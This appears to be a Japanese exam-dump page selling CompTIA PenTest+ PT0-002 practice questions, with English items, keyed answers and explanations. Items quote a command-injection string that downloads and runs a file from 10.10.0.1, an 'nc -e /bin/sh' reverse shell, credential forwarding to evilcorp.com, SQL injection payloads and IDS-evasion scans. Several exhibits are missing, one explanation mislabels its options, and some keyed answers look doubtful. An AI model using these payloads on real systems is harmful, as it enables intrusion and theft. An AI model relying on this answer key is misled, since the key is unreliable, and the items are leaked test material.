2024年最新の本日更新された最新のPT0-002のPDFにはPT0-002テスト限定無料!
完全版最新の問題集PDFで最新PT0-002試験問題と解答
CompTIA PenTest認定は、倫理的ハッキングにおける基本的な認定として高い評価を受けており、企業や組織に対するサイバー攻撃のリスクが増大する中、この試験は非常に需要が高まっています。PenTestの認定を取得することで、業界で高い能力を持っていることを証明し、他の人との競争に勝ち、差別化を図ることができます。
Comptia PT0-002認定試験は、浸透試験証明書の業界標準を設定するため、現在のサイバーセキュリティ環境で大きな重要性を保持しています。成功した候補者は、ネットワークとシステムのセキュリティリスクと脆弱性を分析するのに熟練しており、組織のセキュリティ姿勢を決定する際に包括的で系統的なアプローチを採用することができます。
質問 # 149
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
- A. Interview all stakeholders.
- B. Clarify the statement of work.
- C. Identify all third parties involved.
- D. Obtain an asset inventory from the client.
正解:B
質問 # 150
A client asks a penetration tester to retest its network a week after the scheduled maintenance window. Which of the following is the client attempting to do?
- A. Determine if the tester was proficient.
- B. Test the efficacy of the remediation effort.
- C. Determine if the initial report is complete.
- D. Test a new non-public-facing server for vulnerabilities.
正解:B
解説:
A retest is a follow-up assessment where the penetration tester checks if the vulnerabilities found in the initial test have been fixed or mitigated by the client. A retest can provide many benefits, such as verifying the effectiveness of the remediation actions, showing improvement to internal or external stakeholders, and reducing the risk of future exploitation. A retest is usually performed after a certain period of time, which can be agreed upon in the rules of engagement or the statement of work. A week after the scheduled maintenance window is a reasonable time frame to allow the client to apply the necessary patches or configuration changes to their network. Therefore, the client is most likely attempting to test the efficacy of the remediation effort by asking for a retest. References:
*The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 7: Reporting and Communication, page 375-376.
*Is a Re-Test Included with a Penetration Test?1
質問 # 151
For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to
https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:
Which of the following lines of code should the security engineer add to make the attack successful?
- A. geturlparameter ('username')
- B. crossDomain: true
- C. redirectUrl = 'https://example.com'
- D. window.location.= 'https://evilcorp.com'
正解:B
質問 # 152
Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?
- A. Cyber Kill Chain
- B. Well-Architected Framework
- C. OWASP Top 10
- D. MITRE ATT&CK
正解:D
質問 # 153
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
正解:
解説:
Explanation
1. Reflected XSS - Input sanitization (<> ...)
2. Sql Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - paramtrized queries
7. SQLi error - paramtrized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls
質問 # 154
A penetration tester has prepared the following phishing email for an upcoming penetration test:
Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
- A. Social proof and greed
- B. Authority and urgency
- C. Scarcity and fear
- D. Familiarity and likeness
正解:B
質問 # 155
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS
&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
- A. chmod 600 /tmp/apache
- B. grep -v apache ~/.bash_history > ~/.bash_history
- C. rm -rf /tmp/apache
- D. taskkill /IM "apache" /F
正解:C
解説:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
* cd /tmp: change the current directory to /tmp
* wget
http://10.10.0.1/apache: download a file named apache from http://10.10.0.1
* chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
* ./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf
/tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.
質問 # 156
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
- A. The reverse-engineering team may have a history of selling exploits to third parties.
- B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
- C. The reverse-engineering team will be given access to source code for analysis.
- D. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
正解:C
質問 # 157
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
- A. Move laterally to create a user account on LDAP
- B. Run the nc -e /bin/sh <...> command.
- C. Obtain /etc/shadow and brute force the root password.
- D. Create a one-shot system service to establish a reverse shell.
正解:D
解説:
https://hosakacorp.net/p/systemd-user.html
質問 # 158
A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:
x' OR role LIKE '%admin%
Which of the following should be recommended to remediate this vulnerability?
- A. Encrypted communications
- B. Parameterized queries
- C. Multifactor authentication
- D. Secure software development life cycle
正解:B
質問 # 159
During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:
/home/user/scripts
Which of the following commands should the penetration tester use to perform this scan?
- A. nmap -load /home/user/scripts
- B. nmap script default safe
- C. nmap resume "not intrusive"
- D. nmap script /home/user/scripts
正解:D
解説:
The Nmap command in the question aims to use custom NSE scripts stored in a specific folder. The correct syntax for this option is to use the script argument followed by the path to the folder. The other commands are either invalid, use the wrong argument, or do not specify the folder path. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs - CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam
質問 # 160
During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below.
Which of the following vulnerabilities was the attacker trying to exploit?
- A. ..SQL injection
- B. ..Insecure direct object reference
- C. ..Session hijacking
- D. ..URL manipulation
正解:A
解説:
The vulnerability that the attacker was trying to exploit is SQL injection, which is a type of attack that exploits a vulnerability in a web application that allows an attacker to execute malicious SQL statements on a database server. SQL injection can allow an attacker to perform various actions on the database, such as reading, modifying, deleting, or creating data, or executing commands on the underlying OS. The log shows that the attacker was sending thousands of requests to the same URL with different parameters, such as id=1' OR 1=1;-, id=1' AND 1=2;-, or id=1' UNION SELECT * FROM users;-. These parameters are examples of SQL injection payloads, which are crafted SQL statements that are designed to manipulate or bypass the intended SQL query. For example, id=1' OR 1=1;-- is a payload that terminates the original query with a single quote and a semicolon, appends an OR condition that is always true (1=1), and comments out the rest of the query with two dashes (-). This payload can cause the web application to return all records from the database table instead of just one record with id=1. The other options are not vulnerabilities that match the log entries. Session hijacking is a type of attack that exploits a vulnerability in a web application that allows an attacker to take over an active session of another user by stealing or guessing their session identifier or cookie. URL manipulation is a type of attack that exploits a vulnerability in a web application that allows an attacker to modify parameters or values in the URL to access unauthorized resources or functions. Insecure direct object reference is a type of attack that exploits a vulnerability in a web application that allows an attacker to access objects or resources directly by modifying their identifiers or references in the URL or request.
質問 # 161
Which of the following describes how a penetration tester could prioritize findings in a report?
- A. Network infrastructure
- B. Business mission and goals
- C. Cyberthreats
- D. Cyberassets
正解:B
解説:
Prioritizing findings in a penetration test report should align with the business mission and goals. Understanding the business context allows a penetration tester to assess the impact of vulnerabilities in relation to the organization's critical functions and assets. This approach ensures that recommendations are not only technically sound but also relevant and actionable within the business's strategic framework. Options B, C, and D (Cyberassets, Network infrastructure, and Cyberthreats) are important factors but should be considered within the context of how they affect the business's mission and goals.
質問 # 162
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.
While reading the script, the penetration tester noticed the following lines of code:
Which of the following was the script author trying to do?
- A. Disable NIC.
- B. List processes.
- C. Spawn a local shell.
- D. Change the MAC address
正解:C
解説:
The script author was trying to spawn a local shell by using the os.system() function, which executes a command in a subshell. The command being executed is "/bin/bash", which is the path to the bash shell, a common shell program on Linux systems. The script author may have wanted to spawn a local shell to gain more control or access over the compromised system, or to execute other commands that are not possible in the original shell. The other options are not plausible explanations for what the script author was trying to do.
質問 # 163
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.
Which of the following can be done with the pcap to gain access to the server?
- A. Use John the Ripper to crack the password.
- B. Replay the captured traffic to the server to recreate the session.
- C. Perform vertical privilege escalation.
- D. Utilize a pass-the-hash attack.
正解:D
質問 # 164
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
- A. nmap -sA -sV --host-timeout 60 192.168.1.10
- B. nmap -f --badsum 192.168.1.10
- C. nmap -A -n 192.168.1.10
- D. nmap -p0 -T0 -sS 192.168.1.10
正解:B
解説:
The nmap -f --badsum 192.168.1.10 command is most likely to avoid detection by the client's IDS, as it will use two techniques to evade IDS signatures or filters. The -f option will fragment the IP packets into smaller pieces that might bypass some IDS rules or firewalls. The --badsum option will use an invalid checksum in the TCP or UDP header that might cause some IDS systems to ignore the packets.
質問 # 165
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
正解:
解説:
質問 # 166
A compliance-based penetration test is primarily concerned with:
- A. obtaining specific information from the protected network.
- B. bypassing protection on edge devices.
- C. obtaining Pll from the protected network.
- D. determining the efficacy of a specific set of security standards.
正解:D
質問 # 167
Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?
- A. Identifying technical contacts at the company
- B. Crawling the company's website for company information
- C. Scraping social media for personal details
- D. Registering domain names that are similar to the target company's
正解:C
解説:
Scraping social media for personal details can help a penetration tester craft personalized and convincing social engineering attacks against top-level executives, who may share sensitive or confidential information on their profiles. Registering domain names that are similar to the target company's can be used for phishing or typosquatting attacks, but not specifically against executives. Identifying technical contacts at the company can help with reconnaissance, but not with social engineering. Crawling the company's website for company information can provide general background knowledge, but not specific details about executives.
質問 # 168
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
- A. SOW
- B. MOU
- C. NDA
- D. MSA
正解:A
質問 # 169
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:
Which of the following is the penetration tester conducting?
- A. Brute force
- B. DoS attack
- C. Port scan
- D. Credential stuffing
正解:A
解説:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.
質問 # 170
......
無料PT0-002試験問題PT0-002実際の無料試験問題:https://jp.fast2test.com/PT0-002-premium-file.html
無料PT0-002試験を簡単に100%合格できる試験問題集:https://drive.google.com/open?id=14kCDLf2HnqUlEI-cUnzYi75jcGG7lxaK